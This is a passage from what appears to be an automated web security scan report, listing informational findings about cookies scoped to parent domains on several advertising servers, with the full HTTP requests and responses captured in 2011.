dcenv=DCITC; path=/; domain=usaa.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.8. http://ad.amtk-media.com/iframe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amtk-media.com
Path:	/iframe

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PrefID=51-131422944; expires=Sat, 11 May 2013 23:37:12 GMT; path=/; domain=.amtk-media.com
CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:12 GMT; path=/; domain=.amtk-media.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /iframe?spacedesc=2107089_1090554_728x90_1204852_2107089&target=_blank&@CPSC@= HTTP/1.1
Host: ad.amtk-media.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:12 GMT
Server: Apache/1.3.37 (Unix)
Cache-Control: no-cache, must-revalidate
Expires: Tue, 1 Jan 1970 01:01:01 GMT
Pragma: no-cache
P3P: policyref="http://ad.amtk-media.com/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Set-Cookie: PrefID=51-131422944; expires=Sat, 11 May 2013 23:37:12 GMT; path=/; domain=.amtk-media.com
Set-Cookie: CSList=1090498/1090554,0/0,0/0,0/0,0/0; expires=Wed, 10 Aug 2011 11:37:12 GMT; path=/; domain=.amtk-media.com
Content-Type: text/html
Content-Length: 4217
Connection: close

<SCRIPT LANGUAGE="JavaScript">

function Measure_this(EV)
{
var img = new Image();
img.src = "http://ad.amtk-media.com/image_htmlping?spacedesc=2107089_1090554_728x90_1204852_2107089&af=1108111&t
...[SNIP]...

13.9. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clk;233236047;62821348;d?https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://personal.vanguard.com/us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1
Set-Cookie: id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Thu, 12 May 2011 11:01:14 GMT
Server: GFE/2.0
Content-Type: text/html

13.10. http://ad.turn.com/server/ads.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.turn.com
Path:	/server/ads.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
adImpCount=Z1-UkUPq1vFj8GCnevJA2KXPE2TFnOA0M_WT2exB_6Nh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MBxqPiAYpCYd3j_6MfsPlMh53jqED7k2YniAtZPVqfFWyxKvcAJbr9b_kzSFkanJuWO28abj1iv9Gv55XNWfMiw5pMuH6RTJNAHblpwBDk2T1wXcoL7Q2zkkhi9AC1e6PNmlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYexXtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSurscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLNnm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib1OoXqrfdwtdG7Pp8fEmP0RO1BgA0BJmNitU_2NEj2fHdezpP7kSHcGVCNOXldgVDwW4Q7G96F_uxzfd0sMvSg4z5M54jeAtYCpK6P6H7YLfn1DM2JHon2Lg_l7lDsiT8znxJAatjK_8wTO5tRuZ3XmAl8yAkjzMu60avymcp27zO-9MBVRaOICeVmt0y5elVS00w8o4kTkeT0M3Rv13tNe-KMtsmN_rfKIZLBsrIbZ0Ab_1obB3eU-U6Z0afsrnZftOdxqgu9zaA9BEiA6GyCALmKUKKFE7ohNDi6PefIl64Pb4jyDZez37XoLDFRz9aXnoPz5SThj_DvdguRRNEucYg00aQbrhHmId6TwPhXu76yC6Xpua0XHhwiiO6LimyFMzyKuXBH_zaKGoR-cizFPU5q-qS65e77PR9HaVucWwVvnmlsEQ_Atbdsc7UFm5r_xNRMntMj0v83tuXwoxESvmHp0q8wlx1yaN_b8Qgsy2AKyQi2Rbow26cVTOuaTA2O7EcPEhO-noAo46R_e24qwGCrSBorbtNH5M4cO413R5q6ohebL9J2uZQCBqdE68xlu-7BMsZILlJ1GaKK7JeQ0NX3h3aJ1949KHw8E3HcObqqagiCGVgCdK45TXMokXLNbLuay2_Mt8CFITD7Jngr96fRVjMkjVdVwCfn3jY17LdcA89lw_nuxmuMlq4JPuMvBgd7KD-dSBKfWGSR1M5LiNft9usTHYdghvjPaGdOl0oeDPIpDvfXPcF_hHNKAWi9PW-kET4hoTQkmFc9qp_NZWUKqCzXEjua3bdNL3CHoIF3JRLm-lzLvmU4Mu5vDpETlLJNWSrKQ378tsap95j5WqVoBRRvw_8l_9s_rOZMLzYU2TbhE8zQ2PWHJZhQi88rAm7PyPAWBG8bc1l4eZXJ7qI6SVzjsUIQsGpeiuqy0wZsvJnUfvCegfWPkjFXygnBsrvjdzgzubbc5BofE4fxcMPpyUlfN1EzgUZ2v0L4yTh1VNDYPhttMQaQJ-b77UV8QBUBB42JBqSKatn3vpXyL6TOAicxCOf2XgpY5js6GsmnvWs8SyvDw_QeTyHBaWJSPcsWWbSJo-8gq8nYPQ6BzbnNtDWU-qVEEawvsFJvVrgq6UuEmTyoYjhtb_gPFxhiDjF0OxifaKQDH01ro4Wwg; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
fc=vaJ6aoyywMi4NqtlKsU64lht9mm7-E1xIImTItPA1urbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOwF6Kobi_0otjkQAmScc-TZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
pf=A62R0s-qigjspkCN3ccCJZUfVYhQeEUQKVt0ATDwEBd4MaYm-hBniQ2x_WbJU5VofR8HsN28iFo6HdZJoYg636sNildKFCNXpyKvUiTLZIHjhKTZoZfl0UmM4YAE9VltLd4zaBhLXK6dA3tQW6GTY_mhMXcZkp2CGVOUe9dNA1dLc3SbvsAbpvKUhZ_1F-gMqt697FUnnCyNJa5eXuHVqkYk9oOpEEnBnxokixh0TAcnTloknPCKo_m2KWZ0znMHGX1FGgNaH1QNLww2o9FWDf92KpcEjM9puswoJnlptpg_Ua1SMLgL8e4oitE3gQEt0IYL2CsvvDQbzbzoZi58WVFU2_HfnlKzH2WjiB0I74yjr5MEZ55HOjknaleEn8uqphJLAkUsMWh_vdfMYZ4DsAqVswvpKACSML7qepV3TXcVzrbaB5_N9dG_mUB3DBQpHCwQOntCh3wzWqFyTO9sCmbID1pM7GdJCmEvQvhgCerVKPuxNShLT7BdA74b9PIpJFJv0bKrvIAXiY5kxeBqDZM9McQOVbCG47DlR2tl0RZrXlLfPhjB-LAv0hBAzyAT8WyNLsptBsE0pyyMNzm8KTDTfIrxKwKcgVAF0j3DpG-Ah_L2mBEhIVZyz3v4hUv82NTphEWhwEZTsAeCcCRJGQ16FhMiQjewtL7hTKHHtYomz6Mgv9ntnMipgM9tObOSRi5sdEi6v2SSHlqkNcZ1Insylw9OuZiK2Z9Z1ZInGi2VyX45sYdTfBGAwKx_QKsRDOFWXyC8BwuYcP4g_M8_5sW-t1RZ1RZoZx7lrsMhMHodIDnIK6ly468s-StQw1rNNbnQrRiBaZdoox-8l-4ssS8cnCaJbHr6avLClL1L-ZgHVS17gTosFV1LPoOJqMoPVx8L9V4GQ55oLDrsRz9rTx9FeqPBBvBYGO1SdqujwXgi0vu0SmNRlepXu23ylR2425RDJExopm1fmCCVJh_u9NPFwH371j224eEs7ZO_Ajtb9hEO5hT0MYYwff0a4aDJ8dVm-HlCOmQllIxHHVPmqo5POfQNhu-I5BtsxdNdff3L0rrE_rQqKLBssQ48bm9_mXQzReNjx3lXy785TIo-y5veNkje6bZOCdvzPqpApnQKiSIwki5f-ITER4DSY4219M583u_ZPKiH6Ea4p59q66AhR0SCoMm0IXZ_t5_lhYgWzvjS6P-UHDNUBWN18PSjuJp9aVntFwJIXFrQO8XwyhujvEUOLmkRuJtqn5C1FWr3rHK_ua4i4QGywfYupaV2fuScMz9nUn-9DR4XMyfjq6f9MS-DaFKt2RaSz_BBjJKiIA7uafV8NNMTbjh0U1qug__vmYjXW251NXxsKK_4qFzSypNenDnJ6HQ-3068v6hBJfEyf0yd-2fLUXx6iqh9wMyw-RaWvEndJRgsZP3zOckxnpD1Bh0doyFi9Md6WZu8mx8U3kUMFDpZ0SqI-5d7X_-8-uyf42RpEQk10dwHo6E6IPJGWiCATH5pcXIPM9vPxG-uEMBzxe02yDopCwxH8LV8wxWtacb8pPjx7gKH5cGBR1KqovJK3yVBhrs2V7Q; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server/ads.js?&pub=2137329&code=8842770&cch=8841762&l=300x250&tmz=-5&area=-1&res=1920&rnd=0.9122231449000537&url=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxbusiness%2F300x250%2Fros%3Ft%3D1305200290013%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F%26refer%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F&loc=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F3%2Ffoxbusiness%2F300x250%2Fros%3Ft%3D1305200290013%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F%26refer%3Dhttp%253A%252F%252Fwww.foxbusiness.com%252Fmarkets%252F2011%252F05%252F03%252Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%252F HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2931142961646634775; adImpCount=KYEuEbEdzIexPOAWJfeYOKln6pqoaQRQziZ906G5n9lh-L3XcPmT4hHXOQgApIlYJmGhHmlhz1tR1Ra54XLx9exZbciDuEC399ITX99PRGkjfALGhvabFLX_HNYgBpy7zsH3OeysMWLsGoskDUnQ32UW3oDUqVMEnjcjHnlZzp699EUPTwIVptSzwauIfDF50UELXpdwNzWimNfL-Nmi7usewFozzlXMgPokMgyJNrLXb-XI81xgBum8i__5omlGoGb8OK-JS_geD-AOjNvlazjrwqGVxTrZVslTvK0XJNy1LvWA7B9O59tJc3z0xwBcwZYvWQ3jdmAFCENpjLWIAOnrpAsUPjapkkIXCPH74plPCysLRC9kGHaQwnx8K3q62bUs8Ssbp-uFYFh6pq1lEf6cWpcKiU7h0xb8ZYtzJYIKQy3ndXwkh7nsKDigEiV1pON0d60pht36pNSAN6k5T5dp7127a30TxU6LGRB4-toFYO5L5yvohxHFqCpaWwz8MRf6XYh9X3l0eeXOHdYgcMHVLR1Q0Oh2XJLZ7yFxl2JLxof1MJi1e1lfzGIWlD5XB-4hOga1t0oHT_jvxXdmCbvTH3P7IvCD5zsZZ0zp0hWIhJPDGrpKdeilLy2futIgDR6ReyISuf9c8f0dSTES63stsJ-9_ZBvZCZvl79mvpSrpQYLnJYPjyouscS1y_MCzsH3OeysMWLsGoskDUnQ3zNapi9IPMw4BVwXlP_5fn-99EUPTwIVptSzwauIfDF5c72Lgzd0BeNIWqJiwDwFK1O10jwAbOaGwerHl1LvIeTXb-XI81xgBum8i__5omlGkXBSMXq0q1vbveq4yWMQoTjrwqGVxTrZVslTvK0XJNzsYSOIfK6hrZls5CS-XLj2ln33sVoqbV-D_u6eRcQIRLUoR1az2LIiUgqwQ5w5jhj8SbPeWinK9Ula8ct8WSOo2bUs8Ssbp-uFYFh6pq1lEdvfkLS2DoE0eu8POT8H83ZadJf3V5INFNDsR4ZKDJ4mcJeKmSyR--MbsMIQ0rlodrrwEyFyNLU6DIwD_lSsQNkFYO5L5yvohxHFqCpaWwz8VVBN-2SvEr0yDtFRxHTMq98hrBIakGlMB8rwu9fbvdlCGpAJgvsUqflJ0EjNyh_BLidQFh5fL_c7PIFTJrcyLLvTH3P7IvCD5zsZZ0zp0hXcPFV0-Ov50Uo5kBhZcr2N3SM42cSzwuYE3FYAEtzye7JAJOWN-4yRuUAriRhgD54Q1ZlqB99cVnY_IO_IAET7zsH3OeysMWLsGoskDUnQ352e8VEEpgpwO7Ts28jV-Pi99EUPTwIVptSzwauIfDF5TWVynsXE6JJR2nMJ4XZwrx2mL0WfiC3V5nXCd0AV11LXb-XI81xgBum8i__5omlGQRhFHz2oHg4cDS21feXcHddv5cjzXGAG6byL__miaUY0EeoRlNfgGEix75-D2mgKOOvCoZXFOtlWyVO8rRck3IoK_52mLww86k_nG8yzLEvO-gUMtGUbXxKmHc8P_FNotShHVrPYsiJSCrBDnDmOGOAGAH-YXjH8Wcc1_Q8pUzfZtSzxKxun64VgWHqmrWURLrCzcijsE021q5yp5pP2R-yrRLfgX4GOMcEsRH7J70gen24MCSNJ0G2JqZ4DQ9j-nSKXoODPrx8--4ew1WXbcwVg7kvnK-iHEcWoKlpbDPw14b_0pQcmnnsaOZFw5iWvNx5TSGvWyhQB8L-pvwqhuEIakAmC-xSp-UnQSM3KH8EnnDgCsKZpxm-lBXY-qgLOu9Mfc_si8IPnOxlnTOnSFVrYeB5v_BFls2T4pWLQmC6JiBomX-MYCFTpnkypAnMRzJG2pZfETPvlDwqGhCK2hLeTiaVKtV6X5af9dFLeTwvOwfc57KwxYuwaiyQNSdDfHU5WrsLTjdSQ9y-2fbwMH730RQ9PAhWm1LPBq4h8MXmbGVjjqxZUExqBsn2Hlj_BJgB_AGitcWFl6U5V5WH2UNdv5cjzXGAG6byL__miaUbaUkFZ-_xoAAFQH4DfBULLOOvCoZXFOtlWyVO8rRck3EzByojYSH0yXE6lnM8D6GA80_IP6MuF9ISn1W3O5Fjyw-a56QjJiQ_uzVucZPa51Og608FBgnfw6UoQuWiYjxbZtSzxKxun64VgWHqmrWUR6SHqJN7THmOmti-5XypzylBGT5gaikHT9ryeuWmBgwNwl4qZLJH74xuwwhDSuWh2eRaL0kFt47hDU57F7jP0bAVg7kvnK-iHEcWoKlpbDPzRuKz5LyiqsCky2Vn5bKH7l4YQLxylq3evN0iRNAKbV-8alzppv7oGad06mnvubHh4pJ-3XaEZAAa4N_8TPlibNlkposbhzt7mj0S0dSg1oyWjcP9563_TIedpq3jCxQewtLsfNyfBM56Bk394wOTsVmGTqGXXPNupWQLqqtHKafkzlLumemjXV9hhb_MyitfyeJ3yA1gUz3FCQGmm8HGnqC3bQOXgv9sZFWQNexN3HkJfGjLFZ1HGI9chQDTGFNdjAUpgaNOhq9_K_CXp1oeeC9iVnb2UZABlM_NeUkyGO2gM4-LsIHnJZsdrE4RxHtlVyTXERiNtBBocuW3alOXo2P8qGHjJlNiKfA0GPQdloXpjNUYxNEJsexh9JApW4GyJAuK59JBOfolmWF6WDStF0a1vQZOuFfr6yqhMzmGxiwSJVKEtxrXtBs21DEAcRp5cm43I7gG_DF52RRpvK26cAyKqUxfUld6PWmMdnVzd7XgqNGPZ0-rRB1B4y-WzlLa0fcYAXRP0qLifG-SCwh9Y9VqnS9vieXpveEF3uDJjJLXqVQZM8XNTCrZHwVcDf_9N3OJXvtfxxEpxPl-zr3XLqs-V6neMb930VK9wJqJiniuhNS1g8TAcqiPfHcqkmHAmFmXIrtH4wAplktmzLAdxfnmHcIShE4fw6S3lrcNZ5n2fmaw0wtauolHU1mi9_K-0nLogeZXArLhuOFdRV7TF0bETy6UrO958M5KCWGn2IloDwpRwdxHdshHRfuPzosYwd6fQV8tY6c3VCkFs1fgFcOLCpVERgrJ8kmR_jMLPfMP16SB-0bTKVRbYldAHbZuRm-Ii-D1s5yG_6omnm2FULXbjwgwgPWahesxjs9QpWvNQuN3laJqb29nhP1Kl1MLWSMYaRGCF-YpkPlV-2TBj_obzr0BCWMiclc02P-uR3AGd1CpYs_t-l2gnLYPjvZQ51XMMFIxiaRawzuyeeRl07Sxi6fFHGE6--KuDhEHZr1V5QktLyfrIPUh9NP9XHUGez7Q3HBhjSRbG4m_dTXxx9tYFbsnHnSaTCBuBTc-Uo_8k7Qvz7YHowRiKTNY_EYGK7XEUBC9S1iI2tsm8TEPcB11LUjuajRziNcuNhzqvTK2Y_RPL-e0iEuLJsrjIGfOhgMOxO91TUbWz71GhuIg1WlAtyWTbuMFgZfEtMIYnvOCy55JbJXvTaXnbScBfIe6cUHgoVmYayXoJGq4zZ2CP2TPg82XFtmywMHQBEYvYMCo3nCjn3BWaP1aI8N90s5KGkyqAGI0fs_8ga5xhVIYzTkxTdNFkRt9xOMhBFDXd0FGVnS8mHN3MjGBtLhzezGg; fc=rOKTWV1v6DaX2g0jytJKUyOn8vXDeuwjPmKJhJVvwcJXlgi5eSIoSwJdn09rsfFprRqQpaKBKyof5NYMw3qm9wvMqEF5Nki8mb1vSqmztIUIJ-AjrsJbZ6GCTp5T2j30dEYqzUzY__klNbT2SxWS5br04D6J2SxyIVBENZAnbSrnngf0PZcIDq38zD7r5pFtutG0YZpkq-gucyZY0nojsuNkJpOXtMo8AFUPTRGZKBJ3UiVnv3ZYISevGnJrYAVykHqCHrwqyd-ozlEgvPw7qEnX9lOpFxuB2fsz4E8YJkELN7rBsG-IINNTUtyfth-lWHA8iL5unZOdJTa48E-iGzHhWHx5TefSlTsvVVBrQKfpVQHACSWnrnxdtL1hRQmH; pf=0sI3yJGfJ3Pyf-yMmPil31TY3QVOtnVCEMZ7uoVoRV_o5eqdRq6-P99Np4faIsjVHO4IMjOsKAq9cpxQDNl_hL1MqDuQ2pPLLAIW3rFJuqFcMVNjcbyJtKASgNOSTb4tq_c71VWidX6SvBhyevB9NYnK7b-qnfR5H4v9QjUSoMlGrK9X2_WZ-mWKrLZWEak1sY9Ee4AIrQhLILhZGBMcDyLseWWyhzJbbTJrPuEMLjnaLi9xQE9Rxin09PJrFc7yEItGTIvV_AqLOLMDljJm_T7XqREmUJZez_dplFp_FNQ0mMGPOPieDDaSwPv6zkQBFt07dnfBI0HWdGF7R4c1VzZJ5b5_7t5JtBAXC_F4PZx0Aid4s6fKNBKWZLxWn_8JtMSCwTgQE2dVK6LX49dD_q9p0QF1t4TO4HoiT7duG-fmchF8mX0k8CUcm1XB3W-E9XkZtqWBuJ_-euQ3jo2HohaDZG9pkKhVGPelzpxdGTqOWWpH2c99DXGmUzEwd7qHWN_9MqU__YdhJ643gbd7wQ7OtFDyhR8xMrILamvKOtDSghJ-FH6YJtRUuONdmsApmFf37fHkXxvhV-PSNer1c3b4YDXIrQmre22fdlRBXj6ah2OcNN7z9ANMgcUupX6gxPhFlFQ5D-8fNPCZBAhPOU1BBMkDyRkH4U-Ww3le7NoL0bPslrPfS_5MUFHRGXSBxfOFWWE76GUZ6dghEToQ_Gz_Ksf-4WKethDhdjfN4eLGu1J0Tg8VwW2WbanNVBOHjU3K9gbcljI1ZoejP5lTbjk1CXGKIqwZ8rIzF5CQ1DFHU5hklmJ09qDFQ2ETrfnArO9-qzajBrdGsGZF82sh9u3cuMaA1Fh1Vv1X4Csl_wGaX8fSGHQdkPj7WG5jNxGw3ZYh-2g-Om-1imk3lxMGII5NjPYS8AZJwHuKsBMBzKzMGPBHbtFJFfYLzWR5e9SRqtHbgqe-KHYSqsNLwxTqq0Ac1Oh1o5nC2q8eu3btws1rS4-4txnlnnuGA3Rdyn2v5l5_y4Zub6N58DyBRarr0hMpUzt2LV6XlEXN5yLRHlnv5-6vmKKOR79P7f7nGEcOC2UgN5SjpvgaOtB6KDYQeQxhPRATxnIRJFmM2eG1VsIslZVxVmx1lwg9btvpTEH7vmfyBWscPhFQfPeVr31ZatemVCEL52vKUvBJiGrXP1kYYxbgy80WbVdBy6BhDocky1k9kKayZeTMHzzrCHladn34ZY5xWavZaiMKN_T4__i7UCUp2ekcRhwMxTR6D5G_k48cnKIXx7bEEnhf1iX1lQ5uEoaUK9IXSgZOw-hCcY28lLzR24DJ8rEUp5NiTp925Ofz9OuIIwTMWhUwGkwdYFku3JLL1z6LuJm0Jgq5VpRD0Mxgo9FmPa7ExAIVnCsYHPxPWqTKIuvgla-qVU0eWvOnacIv9EFTV-veRpG9fDkOZ6ykarmBJVygRd5TNR--q94TEEIORaVT10LQ-vZT4HivFgcL7UCyx4fGgfC5jtV6M88YoLcn68__uZGEZcA3R9oKkp4nfOeukO9uduITdvhe2aJDvOggf8g2WwBUGaYzafSW4pll-3igwvJ1a-cH9LLDm5NYOLSjkpj08j5dTA; rrs=1%7C6%7C9%7C4%7C1002%7C6%7C1%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15104%7C15105%7C15104%7C15105%7C15104%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Sat, 14 May 2011 11:39:23 GMT
Set-Cookie: uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:23 GMT; Path=/
